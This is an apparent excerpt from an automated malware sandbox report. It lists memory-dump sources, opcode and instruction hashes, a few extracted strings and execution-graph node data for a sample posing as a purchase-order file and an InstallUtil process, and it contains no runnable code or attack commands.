                                                          • Opcode Fuzzy Hash: de8a6493495ea935541b4278f5dda6908dcd2c6841c205e900af1a505c98ba62
                                                          • Instruction Fuzzy Hash: E86168B0E142298FDBA4CF68C884B8EB7F5BF49314F5481A9D45DEB202D730AA85CF15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6879f978427ae0a3a51fd710d502db6edfcc1637e09f2e89ebe1609139f69501
                                                          • Instruction ID: 382317e3bdd3fdda92cf212a2d4a8552644e948f29b4ce2d43a3726f204d6e18
                                                          • Opcode Fuzzy Hash: 6879f978427ae0a3a51fd710d502db6edfcc1637e09f2e89ebe1609139f69501
                                                          • Instruction Fuzzy Hash: B7513C71D056588BEB2CCF2B8D446DAFAF3AFC9300F14C1FA944CA6255DBB049858F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2e236004877c9788e6a9f4007cb1dcfd13f864c01ddb4b7b5524a0610f140c4
                                                          • Instruction ID: cc06adf998cc299bc2bea092580ab8662531212be604d0283cf5cade216e1b0a
                                                          • Opcode Fuzzy Hash: a2e236004877c9788e6a9f4007cb1dcfd13f864c01ddb4b7b5524a0610f140c4
                                                          • Instruction Fuzzy Hash: 335161B1D056588BEB6DCF2B8D402DAFAF3AFC9340F04C1FA944CA6265EB7409858F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59b26dd4681282105a26a460fe661e01068d4de105767132f27642bf6fd6afdb
                                                          • Instruction ID: e9ae567d25f1646b103bbd5d181d907443d50e9ca14632358964a5a4692d78d9
                                                          • Opcode Fuzzy Hash: 59b26dd4681282105a26a460fe661e01068d4de105767132f27642bf6fd6afdb
                                                          • Instruction Fuzzy Hash: 0341E0B4D003489FEB14CFA9D985BEDBBF1BB09314F209129E419AB250D7B8A845CF85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3484c2773cbde041e49031b35adf4586d2e447f21dd659d2ec51d49cb7c6b66a
                                                          • Instruction ID: 8a9670bf6bd7620e8c5667dd83619f3d1cd3125d119ad2dc6ec14a80d6411a02
                                                          • Opcode Fuzzy Hash: 3484c2773cbde041e49031b35adf4586d2e447f21dd659d2ec51d49cb7c6b66a
                                                          • Instruction Fuzzy Hash: 8441C271D04A588BEB1DDF6B8C4028AFBF3AFC5301F48C1BA8858AB265EB344542CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 190dac3731eb180fc9bc691885160e2e18fe6ebebe241fc772bc14538f543cec
                                                          • Instruction ID: dbc9e19d05ff9d68cf49c1afce16bdbe116bc55cd8727564ea8b3ff53f8ca7dd
                                                          • Opcode Fuzzy Hash: 190dac3731eb180fc9bc691885160e2e18fe6ebebe241fc772bc14538f543cec
                                                          • Instruction Fuzzy Hash: 64415670D05248CFDB08DFA8D18A7EDBFB2FB89310F9490AAE449A7294D7785945CF02
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16f0e021a5f1f81b56d6d904428d5bb62ce4ae5235829dd0c02b5bac3988091f
                                                          • Instruction ID: 46455001ab567de0fc49d1f3ec5934009926adba56459e42b729b25351590d40
                                                          • Opcode Fuzzy Hash: 16f0e021a5f1f81b56d6d904428d5bb62ce4ae5235829dd0c02b5bac3988091f
                                                          • Instruction Fuzzy Hash: EC41D775E056588BEB29CF6AC8846DDBBF2ABC9310F14C0A6D40DAB354DB345A85CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e85f18ced04681d5c935c7124c2fe764565941233a2d5c6ef38f340725a1d6e2
                                                          • Instruction ID: 5d8c4072637b094bdf7011426112d6cd6a6f4cd1b48c30ea4cea1c425fa442bf
                                                          • Opcode Fuzzy Hash: e85f18ced04681d5c935c7124c2fe764565941233a2d5c6ef38f340725a1d6e2
                                                          • Instruction Fuzzy Hash: C041FEB5D052589FCB10CFA9D481AEEFBF4EB49310F24946AE415B7340C738AA45DF64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6c6dc8b4e845f032bd05a6954f296ecbb52ecd0c9ef3484f831d4ed631131d9
                                                          • Instruction ID: 85d6a7e1f064eb95954cf2cf532e2cbba59ae34e46971025602ebe983def3a6d
                                                          • Opcode Fuzzy Hash: d6c6dc8b4e845f032bd05a6954f296ecbb52ecd0c9ef3484f831d4ed631131d9
                                                          • Instruction Fuzzy Hash: F5415071E04A588BEB1CCF6B8C4469AFAF3AFC9301F14C1B9980CAB265EB3055468F01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8eb24ad9d77aeb7d5f16f625b6e048fcc62c7c6f0aa37fea6d9ea030cf98e6ef
                                                          • Instruction ID: eb91684b7a8d6b2f9c4db39e9cdd7480b137f1f5f3a0bb0e3763255e164995bd
                                                          • Opcode Fuzzy Hash: 8eb24ad9d77aeb7d5f16f625b6e048fcc62c7c6f0aa37fea6d9ea030cf98e6ef
                                                          • Instruction Fuzzy Hash: FC41E571E05618CBEB18CFAAD9447DDFBF6BF89300F14C0AAD40AA7254EB7449858F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4491ac94f4d1f2d9e2d421ae0b79b244ce3a02786e736b27ab456b1bf1a6560f
                                                          • Instruction ID: 60282d679408d759ea1dde98579bcd760b0bd8067fdad56737c05eb7fca6eb08
                                                          • Opcode Fuzzy Hash: 4491ac94f4d1f2d9e2d421ae0b79b244ce3a02786e736b27ab456b1bf1a6560f
                                                          • Instruction Fuzzy Hash: C041C775E05658CBEB59CF6AC8846DDBBF2ABC9310F14C0AAD40DAB354DB345A85CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f87ccd8833cb11160debf76d5318f69bba9aa5e90e90f7b0b76a99702e638ae
                                                          • Instruction ID: af250b8181f2c74f502435d729a75bed4208f5dd6354615ce882e6b880afc80f
                                                          • Opcode Fuzzy Hash: 6f87ccd8833cb11160debf76d5318f69bba9aa5e90e90f7b0b76a99702e638ae
                                                          • Instruction Fuzzy Hash: 8041EEB5D04258DFCB10CFA9D480AEEFBF4AB49310F24946AE415B7240C778AA45DFA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb81fd01a9770d3fe427eff2259a5589a1a6982f69c645463661edfd65d768fe
                                                          • Instruction ID: 37dcd9e3de71e9a1c6bd7afac058849f344da3ba3ef411c62fb0e71b8d337692
                                                          • Opcode Fuzzy Hash: cb81fd01a9770d3fe427eff2259a5589a1a6982f69c645463661edfd65d768fe
                                                          • Instruction Fuzzy Hash: A83167B6D042489FDF11CFA4D4806EDBBF1AF09320F14949AE454B7291D7389A86DFA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33e26c6e8f1fcfd190fc3ab6c0e6d1397969b0137d34d3726b7cee2f8a801b57
                                                          • Instruction ID: 35351534f777401c6c218b836bd0a0b71d5d3d8ea6ad76f634ed157436014e97
                                                          • Opcode Fuzzy Hash: 33e26c6e8f1fcfd190fc3ab6c0e6d1397969b0137d34d3726b7cee2f8a801b57
                                                          • Instruction Fuzzy Hash: 5E315E71D057559FDB1ACF6ACC5828ABBB2AF85300F09C0FAC488DB252EB744985DF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac5f29849b675becf6784a42410333adedceec2ac2d309adfc48e7d46d0ba82b
                                                          • Instruction ID: 6f8bbd2fa85c7537d9826f729bcc9306cfb441fd255802f0f87a825c28b4a72e
                                                          • Opcode Fuzzy Hash: ac5f29849b675becf6784a42410333adedceec2ac2d309adfc48e7d46d0ba82b
                                                          • Instruction Fuzzy Hash: B321DCB5D052089BCB14CFAAD981AEEFBF5FB49320F14945AE819B7300C735A941CFA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 978e933fa0d37d79340594e162963c9edefa36c358177d76e51a47945429e676
                                                          • Instruction ID: 3f6574075e4b82348bb87942336987aba25f8fc032afa8ff5d5955d3a950318f
                                                          • Opcode Fuzzy Hash: 978e933fa0d37d79340594e162963c9edefa36c358177d76e51a47945429e676
                                                          • Instruction Fuzzy Hash: 5F21BD71D056199BEB28CF9BDC496DAFAF7BFC8304F04C1BAD44CA6254EB700A859E41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d85d1aa91d8937b98aaae0a339066906763f3decc6401d3dd46411b0f7a3388
                                                          • Instruction ID: ccec97480ffa3d69ab578a2e89fdb695134d18300dbc42baea0e33084a558322
                                                          • Opcode Fuzzy Hash: 1d85d1aa91d8937b98aaae0a339066906763f3decc6401d3dd46411b0f7a3388
                                                          • Instruction Fuzzy Hash: B721CDB5D042189FCB14CFAAD981AEEFBF5FB49320F14945AE819B7210C7356941CFA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                          • API String ID: 0-723292480
                                                          • Opcode ID: 796069c96212e4901fac693e8b3e9e2ddfbc543b1278d7a6d5470bdb61a3874a
                                                          • Instruction ID: e29ab2ea9c194efee4e0d72a4f5577a255fa137010e986187b7e4764f3886d50
                                                          • Opcode Fuzzy Hash: 796069c96212e4901fac693e8b3e9e2ddfbc543b1278d7a6d5470bdb61a3874a
                                                          • Instruction Fuzzy Hash: AD518271A002059FC708EFB994917AEBBF7BFC8700F14882CD1499B395DF35A9469BA1

                                                          Execution Graph

                                                          Execution Coverage:10.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:20
                                                          Total number of Limit Nodes:5
                                                          execution_graph 26250 1560848 26251 156084e 26250->26251 26252 156091b 26251->26252 26254 1561340 26251->26254 26256 1561283 26254->26256 26257 156134b 26254->26257 26255 1561448 26255->26251 26256->26251 26257->26255 26259 1567059 26257->26259 26261 1567063 26259->26261 26260 1567119 26260->26257 26261->26260 26264 682ce88 26261->26264 26269 682ce78 26261->26269 26266 682ce9d 26264->26266 26265 682d0b2 26265->26260 26266->26265 26267 682d730 GlobalMemoryStatusEx 26266->26267 26268 682d4d0 GlobalMemoryStatusEx 26266->26268 26267->26266 26268->26266 26270 682ce9d 26269->26270 26271 682d0b2 26270->26271 26272 682d730 GlobalMemoryStatusEx 26270->26272 26273 682d4d0 GlobalMemoryStatusEx 26270->26273 26271->26260 26272->26270 26273->26270
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8f24fca1165a5fcb820f2b7f890e72b3ec0b5832e835c9b64f765e1654cbd41
                                                          • Instruction ID: f0afc16308b4b8eb5ba2257f95b01cd4653c21f9c8e7977ef475708cb652ff57
                                                          • Opcode Fuzzy Hash: b8f24fca1165a5fcb820f2b7f890e72b3ec0b5832e835c9b64f765e1654cbd41
                                                          • Instruction Fuzzy Hash: A353E831D10B1A8ADB11EB68C8445ADF7B1FF99300F55D79AE4587B221EB70AAC4CF81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1477036df0a820b48b882e13e70e2b29b3dc80a213612b6cfb84922347095bc
                                                          • Instruction ID: e29d7b3c1731bcf5ae563a2546b38f889548846338307bb21cdcc32dd44cbb11
                                                          • Opcode Fuzzy Hash: d1477036df0a820b48b882e13e70e2b29b3dc80a213612b6cfb84922347095bc
                                                          • Instruction Fuzzy Hash: 0C332F31D107198EDB11DF68C8906ADF7B5FF99300F15C79AE458AB211EB70AAC5CB81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: baf548b53ebc1d6b1e233b09fcda07f4a216b5ea323bffca3a222841f9595acb
                                                          • Instruction ID: 8118f6b36d21badea4990e3a45334faa9c0ef3ba89d65dabf2bd333ee2dbe249
                                                          • Opcode Fuzzy Hash: baf548b53ebc1d6b1e233b09fcda07f4a216b5ea323bffca3a222841f9595acb
                                                          • Instruction Fuzzy Hash: 0EB14B70E00209CFDF14CFA9D9917AEBBF6BF88354F148529D415AB394EB749845CB81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c694e0685b543d2defad81ced9ff4a424a57d084b5f5fabf7e62599688756ea7
                                                          • Instruction ID: b54648cb79b389b9c09f3b8fec8581abdd285ad900078dc7a014224623038b23
                                                          • Opcode Fuzzy Hash: c694e0685b543d2defad81ced9ff4a424a57d084b5f5fabf7e62599688756ea7
                                                          • Instruction Fuzzy Hash: CE915B70E00209DFDF54CFA9C9857EDBBF6BF88314F148129E419AB294EB749845CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2124 1566ea1-1566f0a call 1566c08 2133 1566f26-1566f55 2124->2133 2134 1566f0c-1566f25 call 1566724 2124->2134 2140 1566f57-1566f5a 2133->2140 2141 1566f5c-1566f70 2140->2141 2142 1566f8d-1566f90 2140->2142 2150 1566f76 2141->2150 2151 1566f72-1566f74 2141->2151 2143 1566fa4-1566fa7 2142->2143 2144 1566f92-1566f99 2142->2144 2148 1566fe3-1566fe6 2143->2148 2149 1566fa9-1566fde 2143->2149 2146 1566f9f 2144->2146 2147 1567168-156716f 2144->2147 2146->2143 2152 1566ff6-1566ff8 2148->2152 2153 1566fe8 call 1567988 2148->2153 2149->2148 2156 1566f79-1566f88 2150->2156 2151->2156 2154 1566fff-1567002 2152->2154 2155 1566ffa 2152->2155 2158 1566fee-1566ff1 2153->2158 2154->2140 2157 1567008-1567017 2154->2157 2155->2154 2156->2142 2161 1567041-1567056 2157->2161 2162 1567019-156701c 2157->2162 2158->2152 2161->2147 2164 1567024-156703f 2162->2164 2164->2161 2164->2162
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q$LR^q
                                                          • API String ID: 0-4089051495
                                                          • Opcode ID: 62ab7aab6b772608c131f8d027f28b6ea443c8175e4b2252bb8740a64d833f10
                                                          • Instruction ID: b6c3dbe1fb22d7f2f51d1d2552b43891aab883d2dfa7183dd3131e6c7144e5e7
                                                          • Opcode Fuzzy Hash: 62ab7aab6b772608c131f8d027f28b6ea443c8175e4b2252bb8740a64d833f10
                                                          • Instruction Fuzzy Hash: D451F230E1020A9FDB15DFA9C4107AEBBBAFF85714F10842AE405EF245EB71D842CB92

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2781 682e09f-682e0ab 2782 682e0d5-682e0e8 2781->2782 2783 682e0ad-682e0d4 call 682d4c0 2781->2783 2787 682e0eb-682e0f4 call 682d808 2782->2787 2790 682e0f6-682e0f9 2787->2790 2791 682e0fa-682e138 2787->2791 2791->2787 2796 682e13a-682e159 2791->2796 2799 682e15b-682e15e 2796->2799 2800 682e15f-682e1ec GlobalMemoryStatusEx 2796->2800 2803 682e1f5-682e21d 2800->2803 2804 682e1ee-682e1f4 2800->2804 2804->2803
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1865099101.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6820000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8632807eb5d4742ac1a637f9c95b8d1a1bf47de8623ee8094d8290b977b3eb2b
                                                          • Instruction ID: e8d88c19767d3488d5ffcfd068f9941f92bd17d9026a48e5ec7f1889e2ea569d
                                                          • Opcode Fuzzy Hash: 8632807eb5d4742ac1a637f9c95b8d1a1bf47de8623ee8094d8290b977b3eb2b
                                                          • Instruction Fuzzy Hash: F3410572D103568FCB14CFB9D8446EEBFF5AF89310F14856AE508E7250DB749885CBA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2807 682e178-682e1b6 2808 682e1be-682e1ec GlobalMemoryStatusEx 2807->2808 2809 682e1f5-682e21d 2808->2809 2810 682e1ee-682e1f4 2808->2810 2810->2809
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE(8B55058C), ref: 0682E1DF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1865099101.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6820000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: b9d4058b540f43a615b4593d8538c15ac8ae06798236441fb11b8018e3bbb4b0
                                                          • Instruction ID: ef27509825de9327e94556a8925dd575d2370f5da5a54ba29199d121025b0aef
                                                          • Opcode Fuzzy Hash: b9d4058b540f43a615b4593d8538c15ac8ae06798236441fb11b8018e3bbb4b0
                                                          • Instruction Fuzzy Hash: 9711F6B1C1065A9BCB10CF9AC945BDEFBF4AF48324F14816AE918A7240D778A944CFA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH^q
                                                          • API String ID: 0-2549759414
                                                          • Opcode ID: e905cc57a4b62a85d4ea9b74df1426e2ed2e88b00a08631963e7058483c49b95
                                                          • Instruction ID: 169ac22b567584cec7734c06c657f4573c7a18a0ded4d80f3bd68b7b55fc1c04
                                                          • Opcode Fuzzy Hash: e905cc57a4b62a85d4ea9b74df1426e2ed2e88b00a08631963e7058483c49b95
                                                          • Instruction Fuzzy Hash: 9531CC71B002058FDB1A9F78E56466E7BE6BB88604F20456ED006DF395EE79CC42CBD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q
                                                          • API String ID: 0-2625958711
                                                          • Opcode ID: 90621fb08aaa3563a66343a2644dfac8af54d8232defd67cb29f1bcc7003aecb
                                                          • Instruction ID: d641f44941d5d8f617068238f6fdb6ba6bfc193f926cb2129a255b1086f5e445
                                                          • Opcode Fuzzy Hash: 90621fb08aaa3563a66343a2644dfac8af54d8232defd67cb29f1bcc7003aecb
                                                          • Instruction Fuzzy Hash: E0317C35E1020ACFDB25CFA9D84069EBBB5FF89314F10852AE415EB244EB71D842CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q
                                                          • API String ID: 0-2625958711
                                                          • Opcode ID: 0dc796667ac536b702a435ee4baa2cc19432c7d0b39c5b1997c35626442afcfd
                                                          • Instruction ID: 0c6f882df0dfca9855d424365b3351209ca9773a2ca4e58bdc6607dcfac79c5e
                                                          • Opcode Fuzzy Hash: 0dc796667ac536b702a435ee4baa2cc19432c7d0b39c5b1997c35626442afcfd
                                                          • Instruction Fuzzy Hash: 3E21E1B1A042124FD719EB7DE4943AE7BA6FF96704F1048AEC005CB255EE39CC85C796
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5776754768f9fc438bdb4da7abf267dbbe3b218e65a93373a1cd60a83e9e8f62
                                                          • Instruction ID: f703867a95c92ff00a401ae4d2233069a147d60c03d61855fef4f8eb809a4969
                                                          • Opcode Fuzzy Hash: 5776754768f9fc438bdb4da7abf267dbbe3b218e65a93373a1cd60a83e9e8f62
                                                          • Instruction Fuzzy Hash: 85128374701102CFCB6AAB3CE48422C77A6FB99748F208A7DE405CB365DE75DC469792
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2b9f7f677c6920b399936df2c344767021de13d7472a8e1a4715bf0b5d87019
                                                          • Instruction ID: 510e8d97225dba83c4798a2302ddae8edb350725057a269a27588a5b58511f56
                                                          • Opcode Fuzzy Hash: d2b9f7f677c6920b399936df2c344767021de13d7472a8e1a4715bf0b5d87019
                                                          • Instruction Fuzzy Hash: 62D19C74B002058FDB15DF68D484AADBBB6FF89314F24856AE806DB391DB34EC42CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a06b07b2d886641b45c4e5fc6dd124115f356540417d7c9dab03ffc2bdee76e4
                                                          • Instruction ID: fd1fe3d0211c55698d3a645e9cac4cc273031e3cbe595f68fc0f97b53d31f798
                                                          • Opcode Fuzzy Hash: a06b07b2d886641b45c4e5fc6dd124115f356540417d7c9dab03ffc2bdee76e4
                                                          • Instruction Fuzzy Hash: 47C19B75B002058FDB14CF69D8807AEBBBAFB88314F24856AE909DF395DB74D841CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
